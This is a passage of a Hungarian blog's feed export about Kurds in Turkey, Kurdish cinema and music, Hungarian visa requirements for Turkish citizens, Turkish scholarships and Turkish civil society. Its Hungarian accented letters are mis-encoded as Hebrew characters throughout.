szabtak ki Tצrצkorszבgban az antiterrorista tצrvיny alapjבn</em> <br /> <br /><a href="http://directory.google.com/Top/Society/Ethnicity/Asian/Middle_Eastern/Kurdish/">Google Directory - Kurdish</a> </div><div align="left"> </div><div align="left"><a href="http://www.kurdishworld.com/toplist/">KurdishWorld Toplist</a> <br /> <br /><a href="http://news.yahoo.com/fc?tmpl=fc&cid=34&amp;amp;amp;amp;in=world&amp;cat=kurdish_issues">Yahoo! Kurdish Issues</a> <br /> <br /><strong><span style="color:#ff0000;">4. KULTRA, MŰVֹSZET</span></strong> <br /> <br /><a href="http://www.turkfilm.net/kurdfilm.html">Kurd filmarchםvum</a> </div> -false - - - - -Efendi - -2004-11-19T21:20:00+01:00 -2005-04-25T18:54:14Z -2004-11-24T20:42:05Z - -tag:blogger.com,1999:blog-7074887.post-110132892520964293 -Kurdok Tצrצkorszבgban -<p align="justify"><span style="color:#000000;">Hתsz יv mתlva kיtszer-hבromszor annyi kurd lesz az Eurףpai Uniףban, mint ahבny magyar - nem mindegy, tudjuk-e, kik ők, mit gondolnak Tצrצkorszבgrףl, az Uniףrףl יs rףlunk, magyarokrףl. Azt mבr meg sem merem kיrdezni, mit gondolunk mi, magyarok a kurdokrףl, hiszen valףszםnűleg a kצzelebbi kצrnyezetnkben יlő nemzeteket - cseheket, szlovבkokat, szlovיnokat, romבnokat, horvבtokat יs mבsokat sem ismerjk igazבn.</span></p><p align="justify">Pedig a kurdlakta tיrsיg ismeretיnek hosszabb tבvon komoly politikai יs gazdasבgi jelentősיge lehet Magyarorszבg szבmבra. Előbb-utףbb a magyar vבllalkozףk is odaיrkeznek. </p><p align="justify"><span style="color:#000000;">Az Oszmבn Birodalomban mיg "voltak" kurdok. Az első vilבghבborת יs a Sevres-i diktבtum utבni tצrצk felszabadםtף hבborת idejיn meg klצnצsen szksיg volt rבjuk - egytt harcoltak a tצrצkצkkel יs az orszבg mבs nיpeivel a megszבllףk ellen, aztבn - a Lausanne-i szerződיs 1923-as alבםrבsa utבn rצvid egy יvvel - a kurd identitבs יs minden, ami kurd, hivatalosan megszűnt lיtezni, s vיres, tragikus יvtizedek kצvetkeztek, egיszen a XX. szבzad vיgיig, amikor megtudhattuk, hogy mיgiscsak lיteznek kurdok Tצrצkorszבgban. Mיg nem is olyan rיgen volt, amikor "komoly" szaktekintיlyek, akik a kurdokat hegyi tצrצknek minősםtettיk, azt bizonygattבk: a "krd" elnevezיs oka, hogy e hegyi - יs termיszetesen tצrצk - nיpsיgek a havas bיrceken kalandozva farkasokhoz ("krt") hasonlף vצltיsekben tצrnek ki. Lיgy szםves, ne nevess ezen, mert mיg sokkal szomorתbb tצrtיnetek is vannak. </span></p><p align="justify"><span style="color:#000000;"><em><strong>Magyarorszבgon eddig keveseknek volt mondandףjuk a kurdokrףl, ami elיrhető, itt olvashatod (ha talבlsz mבst a neten magyarul, םrd meg):</strong></em></span></p><p align="justify"><span style="color:#000000;"><a href="http://www.valosagonline.hu/index.php?oldal=cikk&cazon=155&amp;lap=0"><strong>Husain Shorsh: A kurdok eredete, nyelve יs vallבsa</strong></a> - Valףsבg, 2005. januבr</span></p><p align="justify"><a href="http://www.magyarszemle.hu/archivum/13_5-6/10Laszlo.htm">Lבszlףffy Aladבr: Pingvintבnc a kurdok kצrl</a> - Magyar Szemle, 2004. jתnius</p><p align="justify"><strong><span style="color:#ff0000;">Kurd tיmבban a kצvetkezőket talבlhatod a blogon:</span></strong></p><p align="justify"><strong><span style="color:#ff0000;">Ezen a poston:</span></strong></p><p align="justify"><span style="color:#ff0000;"><strong>1. Aktuבlis kurd informבciףk</strong></span></p><p align="justify"><span style="color:#ff0000;"><strong>2. Kurd kulturבlis hםrek</strong></span></p><p align="justify"><span style="color:#ff0000;"><strong>Van mיg a blogon kurd linkajבnlף </strong></span><a href="http://torokorszag.blogspot.com/2004/12/kurd-linkajnl.html"><span style="color:#ff0000;"><strong>EZEN A LINKEN</strong></span></a><span style="color:#ff0000;"><strong> , de a </strong></span><a href="http://torokorszag.lap.hu/"><span style="color:#ff0000;"><strong>torokorszag.lap.hu</strong></span></a><span style="color:#ff0000;"><strong> oldalon is talבlhatsz egy bő kurd linkgyűjtemיnyt.</strong></span></p><p align="justify"><span style="color:#ff0000;"><strong>___________________________________________________________</strong></span></p><p align="center"><span style="color:#ff0000;"><strong>1. Aktuבlis kurd informבciףk</strong></span></p><p align="justify"><span style="color:#000000;"><strong>ֱprilis 28-בn 17.30-kor</strong> lesz Spath Eszter fotףkiבllםtבsבnak megnyitףja a Kצzיp-Eurףpa Egyetemen (CEU), a kיpek az iraki yezidikről szףlnak meg az ottani kurd vidיkekről. Ajבnlom, hogy nיzzיtek meg, utבna meg egy tצrצkorszבgi kurd egyttesnek, a Sarikamisnak lesz a koncertje ugyanott. A kiבllםtבs a Mediawave fesztivבl rיsze יs ha a megnyitףra nem tudsz elmenni, kb. egy hףnapig mיg nyitva lesz. Eszter hosszת ideig volt mostanבban ֹszak-Irakban, יs jףkat םrt ottani יlmיnyeiről a Nיpszabadsבgban, keress rב ott a nevיre יs lבthatod az םrבsait.</span></p><p align="justify"><span style="color:#000000;"><strong><a href="http://web.amnesty.org/library/Index/ENGMDE240022005">Az Amnesty International jelentיse יs kampבnya a szםriai kurdok gyיben</a></strong>, 2005. mבrc. 10.</span></p><p align="justify"><a href="http://www.hrw.org/reports/2005/turkey0305/">“Still critical”: Prospects in 2005 for Internally Displaced Kurds in Turkey</a> - a Human Rights Watch jelentיse, 2005. mבrc. 7.</p><p align="justify"><span style="color:#ff0000;"><span style="color:#000000;"><a href="http://www.bianet.org/2004/12/28/51626.htm"><strong>Avrupa Birligi ve Krtler</strong></a><strong> BIANET, 2004. dec. 28. </strong></span></span></p><p align="justify"><span style="color:#ff0000;"><span style="color:#000000;"><a href="http://www.bianet.org/2004/12/01_eng/news50893.htm"><strong>Kurdish Demands Ahead of EU Summit</strong></a></span><strong> </strong></span><strong><span style="color:#000000;">BIANET, 2004. dec. 14.</span><span style="color:#000000;"> <em>Teljes szצveg:</em> <a href="http://www.kurdmedia.com/reports.asp?id=2307">What do the Kurds want in Turkey?</a> </span></strong></p><p align="justify"><strong>A nyilatkozat egyes, Tצrצkorszבgban יlő alבםrףival kapcsolatban az ankarai főgyיszsיg dec. 16-בn vizsgבlatot indםtott, miutבn Erdogan miniszterelnצk a parlamenti frakciף előtt előző nap rבjuk hתzta a vizeslepedőt (zavarosban halבsznak, politikבjuk "rבkkeltő" (!), amתgy meg "lejבrt a szavatossבga", szףval, csupa kedves megבllapםtבs). Erdogan beszיdיt </strong><a href="http://www.akparti.org.tr/haber.asp?haber_id=11824&kategori=8"><strong>EZEN A LINKEN</strong></a><strong> lehet elolvasni tצrצkl - kםnos, nagyon kםnos. </strong></p><p align="justify"><a href="http://www.tesev.org.tr/etkinlik/baskin_oran.pdf"><strong>Baskin Oran: Trkiye'de azinliklar: Kavramlar, Lozan, ic mevzuat, ictihat, uygulama</strong></a><strong> 2004. - .pdf (Az יv legmarkבnsabb kiבllבsa a kisebbsיgi jogok mellett, s egyben az esztendő botrבnya is Tצrצkorszבgban, mivel főbb megבllapםtבsai szerepelnek a tצrצk Miniszterelnצki Hivatal mellett műkצdő Emberi Jogi Konzultatםv Tanבcs 2004. oktףberi kisebbsיgi jelentיsיben is, amelyet igen rossz nיven vett a nemzetבllamon יs a katonai puccsokon edződצtt elit, de a tבrsadalom nacionalista csoportjai is. Azיrt 15-20 יv mתlva mבr sokan kצzlk is תgy emlיkeznek mjad, hogy 2004-ben ők mבskיnt gondolkodףk voltak.)</strong></p><p align="justify"><a href="http://www.khrp.org/news/pr2004/OSCE%20submission%202004%20Warsaw.doc"><strong>HUMAN RIGHTS VIOLATIONS AGAINST KURDS IN TURKEY</strong></a><strong> (Kurdish Human Rights Project, 2004. okt.) </strong></p><p align="justify"><a href="http://www.tesev.org.tr/etkinlik/demokratiklesme_cemaatler.php"><strong>Etyen Mahחupyan: Trkiye'de Gayrimslim Cemaatlerin Sorunlari ve Vatandaş Olamama Durumu zerine</strong></a><strong> 2004. </strong></p><p align="justify"><a href="http://www.tesev.org.tr/etkinlik/azinlik_dilleri.php"><strong>CEMAATLER VE CEMAATLERIN HUKUKI SORUNLARI</strong></a><strong> 2004. </strong></p><p align="justify"><a href="http://www.kurdmedia.com/reports.asp?id=2302"><strong>Dr Kristiina Koivunen: Turkey’s EU negotiations from the Kurdish perspective</strong></a><strong> 2004. dec. 8.</strong></p><p align="justify"><a href="http://ethesis.helsinki.fi/julkaisut/val/sospo/vk/koivunen/"><strong>Kristiina Koivunen: The Invisible War in North Kurdistan</strong></a><strong> (2002.) </strong></p><p align="justify"><a href="http://www.radio.hu/index.php?cikk_id=78161&amp;rid=PT1RTTRBVE0"><strong>Hazבtlanok</strong></a><strong> ... Kurdok Magyarorszבgon -2004. febr. 27. </strong></p><p align="justify">--------------------------------------------------------------------------</p><p align="center"><strong><span style="color:#ff0000;">2. Kurd kulturבlis hםrek</span></strong></p><p align="justify"><span style="color:#ff0000;"><em><strong>2005. mבrcius 6. </strong></em></span><span style="color:#000000;">A tצrצk televםziףt felgyelő testlet (RTK) <a href="http://www.radikal.com.tr/haber.php?haberno=145584">betiltotta a Digitrk csomagjבban lיvő Primemax csatornבkat</a>, mivel azok szerinte szakadבr propagandבt fejtettek ki azzal, hogy mבrcius elejיn sugבroztבk a Nיmetorszבgban יlő Yksel Yavuz, "Kleine Freiheit" (Egy kis szabadsבg - Kck Hrriyet) c. filmjיt. A filmet lehetett lבtni tavaly az ankarai, az isztambuli, az antalyai יs a Cannes-i filmfesztivבlon, s tצrצkorszבgi forgalmazבsבt a tצrצk Kulturבlis Minisztיrium engedיlyezte. A filmet bemutattבk a <a href="http://www.kurd-filmfestival.com/fest2003/home01.html">2003. יvi berlini kurd filmfesztivבlon</a> is. Yksel Yavuzrףl יs filmjיről (nיmetףl) itt olvashattok: <a href="http://www.filmz.de/film_2004/kleine_freiheit/">1</a> <a href="http://www.kurd-filmfestival.com/fest2003/home01.html">2 </a><a href="http://www.peterstockhausfilm.de/Freiheit.html">3</a> <a href="http://www.filmzentrale.com/rezis/kleinefreiheit.htm">4</a> <a href="http://www.bfilm.de/kleine_freiheit/">5</a></span></p><p align="justify"><a href="http://www.radikal.com.tr/haber.php?haberno=145650&tarih=06/03/2005">Egy tצrצk napilap cikke szerint</a> a tצrצk mezőgazdasבgi minisztיrium nyelvיszeti problיmבkkal kezdett foglalkozni: megprףbבlja a tצrצkorszבgi nצvיnyek יs בllatok nemzetkצzi latin elnevezיseiből a kurdokra, צrmיnyekre, lבzokra, a ponthusi (gצrצg) kirבlysבgra יs hasonlף "kםnos" dolgokra utalף jelzőket. A cikk szerint az első hבrom בldozat a 'Vulpes vulpes <strong>kurdistanicum'</strong> nevő rףka, az 'ovis <strong>armeniana</strong>' nevű vadon יlő birka יs az eddig 'capreolus capreoulus <strong>armenius</strong>' nיven ismert őz. Nevk ezutבn: 'vulpes vulpes', 'ovis orien anatolicus' יs 'capreolus capreolus capreolus'. </p><p align="justify">Az uniףs felkיszlיs jegyיben בt lehetne keresztelni mיg az alבbbi fajtבkat is: <em>Bal?k: Alosa pontica, thorax armeniacus, glypto thorax kurdistanicus. Srngen: Lacerta armeniaca, timon princeps kurdistanicus. Memeliler: Crocidura lasia, tristrami intrapontus, galereolus ponticus. ַekirge: Bolivira kurda, poecilimonella armeniaca, gomp hoceros armenicos dimorphus, phytodrymadusa armenica, armenicus drap. Bitki: Aristolochia pontica, myosotis lazia, nonea armeniaca, onosma armenum, onnesma armeniacum, symphytum kurdicum, cirsium karduchorum... </em></p><p align="justify">Ez mבr szinte kצzelםti a Kבrpבtok Gיniusza teljesםtmיnyיt. Eszembe jutnak mיg a mankurtok, Ajtmatovtףl, ha יrdekel, nיzz utבna vagy kיrdezd meg a magyar Tarkan Fan Club szerkesztőjיt, ő az orosz irodalom szakיrtője, biztosan eligazםt.</p><p align="justify"><span style="color:#ff0000;"><em><strong>2005. mבrcius 1. </strong></em></span><span style="color:#000000;">Ingyenes, internetes <strong>on-line kurd nיpzenיt sugבrzף rבdiףt</strong> talבlhatsz <a href="http://www.live365.com/stations/dengexelikan">EZEN A LINKEN </a>(Live 365 internet radio - Denge Xelikan) - az adבs jף minősיgű.</span></p><p align="justify"><strong><em><span style="color:#ff0000;">2005. jan. 27.</span> </em></strong>A most kezdődő Berlini Filmfesztivבlon is bemutatjבk <strong>Bahman Ghobadi (1969) "A teknősbיkבk is replhetnek"</strong> (Kaplumbagalar da ucabilir) c. filmjיt, amelyet ebben az יvben Oscar-dםjra is jelצltek. Ghobadi irבni szletיsi kurd, filmjיt Szaddam megdצntיse napjaiban forgatta Irakban a Szaddam-rezsim בltal Kirkukbףl szבműzצtt kurdokrףl, azokrףl a gyerekekről, akik nיmi pיnzיrt a gyalogsבgi aknבk felszedיsיre vבllalkoztak. A film Tokiףtףl Belgrבdon בt Montreבlig besצpצrt mבr kצzel egy tucat dםjat. </p><p align="justify"><strong>Kritika a filmről: Painful 'Turtles' follows Kurdish children in crisis</strong><br />Iraqi film made after collapse of Saddam is true portrayal of kids who find and sell mines to survive. By Roger Ebert / Chicago Sun-Times, Friday, April 22, 2005<br /><br />I wish everyone who has an opinion on the war in Iraq could see "Turtles Can Fly." That would mean everyone in the White House and in Congress, and the newspaper writers, and the TV pundits, and the radio talkers and you -- especially you, because you are reading this and they are not. </p><p align="justify">You may assume the movie is a liberal attack on George W. Bush's policies. Not at all. The action takes place just before the American invasion begins, and the characters in it look forward to the invasion and the fall of Saddam Hussein. The movie never betrays an opinion one way or the other about the war. It is about the actual lives of refugees, who lack the luxury of opinions because they are preoccupied with staying alive in a world that has no place for them. </p><p align="justify">The movie takes place in a Kurdish refugee camp somewhere on the border between Turkey and Iraq. That means, in theory, it takes place in "Kurdistan," a homeland that exists in the minds of the Kurds even though every other government in the area insists the Kurds are stateless. The characters in the movie are children and teenagers, all of them orphans; there are adults in the camp, but the kids run their own lives -- especially a bright wheeler-dealer named Satellite (Soran Ebrahim) who organizes work gangs of other children. </p><p align="justify">What is their work? They disarm land mines, so they can be re-sold to arms dealers in the nearby town. The land mines are called "American," but this is a reflection of their value and not a criticism of the United States; they were planted in the area by Saddam Hussein, in one of his skirmishes with Kurds and Turks. Early in the film, we see a character named Henkov (Hirsh Feyssal), known to everyone as The Boy With No Arms, who gently disarms a mine by removing the firing pin with his lips. </p><p align="justify">Satellite pays special attention to a girl named Agrin (Avaz Latif), who is Henkov's sister. They have a little brother named Risa, who is carried about with his arms wrapped around the neck of his armless brother. We think he is their brother, that is, until we discover he is Agrin's child, born after she was raped by Iraqi soldiers while still almost a child herself. The armless boy loves Risa; his sister hates him, because of her memories. </p><p align="justify">Is this world beginning to take shape in your mind? The refugees live in tents and huts. They raise money by scavenging. Satellite is the most resourceful person in the camp, making announcements, calling meetings, assigning work and traveling ceremonially on a bicycle festooned with ribbons and glittering medallions. He is always talking, shouting, hectoring, at the top of his voice: He is too busy to reflect on the misery of his life. </p><p align="justify">The village is desperate for information about the coming American invasion. There is a scene of human comedy in which every household has a member up on a hill with a makeshift TV antenna; those below shout instructions: "To the left! A little to the right!" But no signal is received. Satellite announces that he will go to town and barter for a satellite dish. There is a sensation when he returns with one. The elders gather as he tries to bring in a signal. The sexy music video channels are prohibited, but the elders wait patiently as Satellite cycles through the sin until he finds CNN, and they can listen for English words they understand. They hate Saddam and eagerly await the Americans. </p><p align="justify">But what will the Americans do for them? The plight of the Kurdish people is that no one seems to want to do much for them. Even though a Kurd has recently been elected to high office in Iraq, we get the sense he was a compromise candidate -- chosen precisely because his people are powerless. For years the Kurds have struggled against Turkey, Iraq and other nations in the region, to define the borders of a homeland the other states refuse to acknowledge. </p><p align="justify">From time to time the aims of the Kurds come into step with the aims of others. When they were fighting Saddam, the first Bush administration supported them. When they were fighting our ally Turkey, we opposed them. The New York Times Magazine ran a cover story about Ibrahim Parlak, who for 10 years peacefully ran a Kurdish restaurant in Harbert, Mich., only to be arrested in 2004 by the federal government, which hopes to deport him for Kurdish nationalist activities that at one point we approved. Because I support Ibrahim's case, I can read headlines on right-wing sites such as, "Roger Ebert Gives Thumbs Up to Terrorism." </p><p align="justify">I hope Debbie Schlussel, who wrote that column, sees "Turtles Can Fly." The movie does not agree with her politics, or mine. It simply provides faces for people we think of as abstractions. It was written and directed by Bahman Ghobadi whose "A Time for Drunken Horses" (2000) was also about Kurds struggling to survive between the lines. Satellite has no politics. Neither does The Boy With No Arms, or his sister, or her child born of rape; they have been trapped outside of history. </p><p align="justify"><strong>Hiner Saleem: Vodka lemon</strong> - Szיp film egy Jerevבn melletti kurd falu יletיről. A Filmkultתra םrבsבt <a href="http://www.filmkultura.hu/2004/articles/films/vodka_lemon.hu.html">EZEN A LINKEN</a> olvashatod. (Ha lבttad, םrj rףla pבr sort!)</p><p align="justify"><strong>Kurd filmekről magyarul mיg itt olvashatsz</strong>: <a href="http://www.filmkultura.iif.hu:8080/2001/articles/reviews/kurdfh.hu.html">Kurd filmhיt Londonban</a> <a href="http://www.filmkultura.iif.hu:8080/2001/articles/profiles/kurdint.hu.html">Interjת Araz Rashid kurd filmrendezővel </a>.. יs termיszetesen a legnagyobb film <strong>Yilmaz Gneyי, a "YOL" (t),</strong> de erről mבr 20 יve annyit םrtak, hogy magad is megtalבlhatsz rףla mindent a neten.</p><p align="justify"><strong><em><span style="color:#ff0000;">2004. nov. 20.</span></em></strong> Nemrיg jelent meg <strong>Sehriban ײzdemir, Gabriele Thierkopf, Mavis Gneser, Luise Blum יs Sati Sanyar</strong> szיp CD-je, <strong>"Lilith"</strong> cםmmel a Lizge kiadף <a href="http://www.lizge.org/">http://www.lizge.org/</a> gondozבsבban (Lilith - Gצgn yarisi/ Halfte des himmels)<span style="color:#000000;"> a "Kadinlar, yarisini omuzlarinda tasidiklari gצkyzne sahip olmalilar" mottףval, ami egy kםnai kצzmondבs. A CD-n kurd (kurmandzsi, zaza), bretagne-i, jiddis, romבniai nיmet, nיmet יs tצrצk nיpdalok vannak. <em>(Sajnos, a Lizge linkje valamiיrt hosszabb ideje nem műkצdik. A lemezt azיrt sok tצrצk - יs nיmetorszבgi - zletben meg tudjבtok venni. Szerintem fantasztikus, ne hagyd ki, ha hozzב tudsz jutni!)</em></span></p><p align="justify"><strong>"En Garde" - Ayse Polat filmje a Locarnoi Filmfesztivבlon</strong></p><p align="justify">Folytatףdik a Nיmetorszבgban יlő tצrצk rendezők sikersorozata. Ayse Polat (34) tצrצk-kurd szבrmazבsת filmrendező mבsodik jבtיkfilmje a 2004. augusztus 14-יn vיget יrt fesztivבlon Ezst Leopבrdot kapott, vagyis a mבsodik legjobb film dםjבt nyerte el. A film kיt női főszereplője Pinar Erincin יs Maria Kwiatkowsky, mindketten megkaptבk a legjobb női alakםtבs dםjבt. A film ősszel kerl a mozikba, remיlhetőleg Magyarorszבgon is. Linkek: <a href="http://2004.pardo.ch/pardo/director.do?lang=e&id=79555">1</a> <a href="http://www.welt.de/data/2004/08/16/319858.html">2</a> <a href="http://www.german-cinema.de/archive/film_person_view.php?film_person_id=400">3</a> <a href="http://www.milliyet.com.tr/2004/08/04/pazar/paz02.html">4</a> <a href="http://www.radikal.com.tr/haber.php?haberno=125107&amp;tarih=16/08/2004">5</a> <a href="http://movies2.nytimes.com/gst/movies/movie.html?v_id=251910">6</a> <a href="http://www.x-verleih.de/x-verleih/neu.jsp?news_id=145">7</a> <a href="http://www.radikal.com.tr/veriler/2004/08/16/haber_125108.php">8</a> 9 10</p> -false - - - - -Efendi - -2004-11-01T21:30:03+01:00 -2005-02-10T12:50:03Z -2004-11-09T11:32:43Z - -tag:blogger.com,1999:blog-7074887.post-109999996314678583 -Vםzum יs tartףzkodבsi engedיly tצrצk בllampolgבroknak - tudnivalףk - -
    -
    Elיg sokan יrdeklődnek, ismerőseik hogyan szerezhetnek magyar vםzumot. Erre a postra megprףbבlom צsszegyűjteni a vםzuminformבciףkat. Jף volna, ha a kצzיrdekű tapasztalatokat, tanבcsokat Ti is megםrnבtok itt a "comments" linken.
    -
    -
    -
    -
    -
    A tartףzkodבsi engedיllyel kapcsolatos kalandokrףl mבr צsszegyűlt nיmi anyag a "Tצrצk hבzastבrs" poston, םgy azt nem hoznבm בt, tehבt az engedיly megszerzיsיvel kapcsolatos tudnivalףkat a jצvőben is ott keressיtek יs oda םrjatok.
    -
    -
    -
    -
    -
    -
    -Fontos tudnivalף! Ez itt nem tekinthetצ hivatalos vםzuminformבciףnak, azt a magyar kיpviseleteken lehet beszerezni Ankarבban vagy Isztambulban. "As is" alapon kezelendצ, tehבt semmilyen felelצssיget nem vבllalok azok pontossבgביrt, vagy azokיrt az esetleges kבrokיrt, amelyek ezen informבciףk esetleges pontatlansבgבbףl szבrmaznak יs a tצbbi, יs a tצbbi. Bבr termיszetesen igyekszem azokat frissםteni, יs az elvבrhatף gondossבggal jבrok el צsszeבllםtבsuk sorבn, stb., stb., semmi garancia nincs arra, hogy ez sikerl is, ezיrt elkיpzelhetצ, hogy ez a post egyszercsak majd tצbb יves, szakבllas informבciףkkal kerl a T. Lבtogatף kיpernyצjיre יs pld. kiderl, hogy mבr rיg nincs szksיg vםzumra.
    -
    -
    -
    -
    - -Vםzumkיrיshez nyomtatvבnyt le lehet tצlteni - - - -EZEN A LINKEN - - - -! (90 napot meg nem haladף tartףzkodבshoz) - -
    -
    - - - -
    -
    -
    - -Macar vizesi icin basvurma formu - - - -ISBU LINKTEN - - - - indirilir! (90 gn gecmeyen seyahat icin) - -
    -
    -
    -
    -
    -
    Akkor most lבssuk, mi kell a vםzumhoz:
    -
    -
    -
    -
    -
    - -
    -
    -Vize iחin Trk vatandaslarinca beyan edilmesi gereken evraklar asagida sunulmaktadir. -
    -
    - -
    -
    -
    -Asagida belirtilen evraklarin birer fotokopisinin de bulundurulmasi צnemle rica olunur. -
    -
    - -
    -
    -
    - -Turist vizesi basvurusu sahsen veya turizm acentasi kanaliyla yapilir. -
    -
    - -
    -
    -
    - -Turist vizesi icin: - -
    -
    - -
    -
    -
    -Bir yili asan geחerlilikte pasaport -
    2 adet renkli vesikalik resim -
    Ise giris belgesi -
    Isveren tarafindan vize basvurusu yapanin חalistigina ve Macaristan’da bulundugu dצnemde izinli olduguna iliskin belge -
    SSK aylik prim bildirgesi / Emeklilik belgesi -
    ַalistigi sirketin vergi levhasi, oda sicil kaydi, imza sirkleri, ticari gazete -
    Gayri menkul belgesi, banka hesabi -
    Maas bordrosu -
    ײgrenci durumunda, צgrenim gצrdg kurumun צgrencisi olduguna ve halen צgrenimini srdrdgne iliskin belge ve צgrenci karti -
    Otel rezervasyonu -
    Uחak bileti -gidis/dצns- rezervasyonu -
    Kaza ve saglik sigortasi.
    -
    -
    - -
    -
    -
    - -
    -
    - -Egitim amaחli vize iחin: - -
    -
    - - - -
    -
    -
    - -
    -
    -Bir yili asan geחerlilikte pasaport -
    2 adet renkli vesikalik resim -
    Egitim kurumundan kabul belgesi veya kayit edildigine iliskin belge veya egitim veren arastirma yerinin kabul beyanati veya davetiyesi -
    Macaristan’daki ikamet adresi -
    Bursun derecesi -
    Mracaat edenin Macaristan’a egitim iחin gidecegine iliskin okulundan veya is yerinden belge -
    Uחak bileti -gidis/dצns- rezervasyonu -
    Kaza ve saglik sigortasi -
    Trkiye’deki egitim derecesini bildiren belge
    -
    -
    -
    - -Is vizesi iחin - -
    -
    - -
    -
    - -
    -
    -
    -Bir yili asan geחerlilikte pasaport -
    2 adet renkli vesikalik resim -
    Macaristan’dan is partnerinden orijinal davetiye veya Macaristan Cumhuriyeti Iחisleri Bakanligi tarafindan onaylanmis davetiye -
    Ticaret Odasi kaydi, vergi levhasi, imza sirkleri, ticari gazete, is faaliyetine iliskin belge -
    Sirketin antetli kagidina (imzali kaseli) mracaat edenin firmadaki gצrevini belirten belge -
    Seyahatin amacini ifade eden beyanat -
    Macar firmayla mnasebeti gצsteren yazismalar -
    Otel rezervasyonu veya resmi konaklama belgesi -
    Uחak bileti -gidis/dצns- rezervasyonu -
    Maas bordrosu -
    SSK aylik prim bildirgesi / Emeklilik belgesi -
    Ise giris belgesi -
    Kaza ve saglik sigortasi
    -
    -
    - -
    -
    -
    - -
    -
    -Tek giris vize creti 35 eurodur. -
    -
    - -
    -
    -
    -Vizeler Macaristan Cumhuriyeti Ankara Bykelחiliginden (adres: Sancak Mahallesi Kahire Cad. No 30 Yildiz/ַankaya, tel: (312) 442 2273, fax: (312) 441 5049) veya Macaristan Cumhuriyeti Istanbul Baskonsoloslugundan (adres: Prof. Dr. Mfide Kley Sok. No 35 Tesvikiye, tel: (212) 225 5519, fax: (212) 296 8248) alinabilir. -
    -
    -------------------------------------
    -
    - -
    - -
    -
    - - -
    -
    -
    - -false - - - - -Efendi - -2004-11-01T13:26:18+01:00 -2004-11-10T17:06:18Z -2004-11-01T23:30:11Z - -tag:blogger.com,1999:blog-7074887.post-109935181179567458 -ײsztצndםjjal Tצrצkorszבgba -<div align="justify">A magyar-tצrצk kulturבlis יs oktatבsi csereprogram alapjבn a tצrצk fיl az alבbbi צsztצndםjakat biztosםtja magyaroknak: <br /> <br /><span style="font-size:85%;">"ARTICLE 17 <br /> <br />The Turkish Party shall grant, on an annual basis, two post-graduate research scholarships for the duration of eight months each, and four Turkish language and culture summer course scholarships for the duration of two months each to study at the University of Ankara or the University of Istanbul. <br /> <br />If the Sending Party so requires, the scholarships may be divided into two or more parts, but no scholarship for research may be shorter than two months."</span></div><div align="justify"><span style="font-size:85%;"></span> <br /></div><div align="justify"><span style="font-size:85%;">Magyarבn, יvente kיt db 8 hףnapos kutatףi (posztgraduבlis) צsztצndםjat lehet igיnybe venni, valamint 4 db 2 hףnapos צsztצndםjjal lehet menni az Ankarai vagy az Isztambuli egyetem tצrצk nyelvvel יs kultתrבval foglalkozף nyבri kurzusaira. A kיt kutatףi צsztצndםj צsszesen 16 hףnapjבt min. 2 hףnapos צsztצndםjakra is fel lehet osztani.</span></div><p align="justify"><span style="font-size:85%;">Akit יrdekelnek az צsztצndםjak יs a pבlyבzat rיszletei, keresse Szentirmai Dףrבt a magyar Oktatבsi Minisztיriumban.</span></p><p align="justify"><span style="font-size:85%;">A Magyar Tudomבnyos Akadיmiבnak is van egyttmkצdיsi megבllapodבsa a tצrצk partnerrel, יs az ELTE-nek is az Ankarai Egyetemmel. Azok rיszleteirצl a kיt intיzmיnyben lehet יrdeklצdni.</span></p><p><span style="font-size:85%;"> </p><div align="justify"> <br /> <br /></div></span> -false - - - - -Efendi - -2004-10-05T23:25:38+02:00 -2005-01-28T22:53:38Z -2004-10-05T21:32:49Z - -tag:blogger.com,1999:blog-7074887.post-109701196972464526 -Civil tבrsadalom Tצrצkorszבgban - -
    -
    Ez a post a tצrצkorszבgi demokratikus civil יs ifjתsבgi szervezeteket mutatja be. Azokat, amelyek kיpviselői nem (nyugalmazott) katonatisztek יs nem בllami rendszבmת autףkkal kצzlekednek (vagy legalבbbis nem tudunk rףla).
    -
    -
    -
    -
    Az Eurףpai Bizottsבg יs a tagבllamok 2005-től mיg erősebben fogjבk tבmogatni az תgynevezett tבrsadalmi pבrbeszיdet, a tצrצk civilek יs a tagבllamok non-profit szervezetei kצzצtt, azיrt, hogy szűnjenek az eurףpai tבrsadalmakban meglיvő, Tצrצkorszבggal kapcsolatos előםtיletek, hogy egymבsra talבljanak azok az eurףpai יs tצrצk emberek, akik agyilag mיg kיpesek az elfogulatlan, צnבllף, demokratikus, יpeszű gondolkodבsra, hogy Tצrצkorszבgban erősצdjיk a civil tבrsadalom, amelynek fejlődיsיt a korבbbi יvtizedekben ugyanתgy, ahogy annak idejיn Magyarorszבgon is, a hatalom birtokosai - akik mindig jobban tudtבk, hogy mi kell az egyיnnek - igyekeztek megakadבlyozni.
    -
    -
    -
    -
    A tצrצk civilek helyzete mיg mindig nehיz. Az בllam hosszת ideig nem szolgבlni, hanem ellenőrizni akarta az בllampolgבrokat, "embert akart faragni belőlk", ahogy a civilek mondjבk. A demokratikus NGO-k mיg kevיssel ezelőtt is az "בllam יs a nיp ellensיgei" voltak. A civilek szerint a tצrצk emberek mיg most sem nagyon mernek יlni jogaikkal, gondolkodבsuk az elmתlt יvtizedekben kissי "militarizבlףdott", s a jog alkalmazףi is inkבbb a korבbbi status quo-t, mintsem az emberi jogokat vיdik. A civilek תgy lבtjבk, hogy tצrצkorszבgi hagyomבnyok szerint eddig az "בllami" struktתrבk (főleg a katonבk) meghatבroztבk az בllami ideolףgiבt, kijelצltיk a mozgבsteret, a tצrvיnyhozףi, a vיgrehajtףi יs a bםrףi hatalmi בgak pedig "a feladatokat vיgrehajtottבk". Kיt יvvel ezelőtt pיldבul az egyetemistבknak mיg csak arra volt joguk, hogy az egyetemeken sportegyesleteket hozzanak lיtre, minden mבs szerveződיst jogszabבlyok tiltottak.
    -
    -
    -
    -
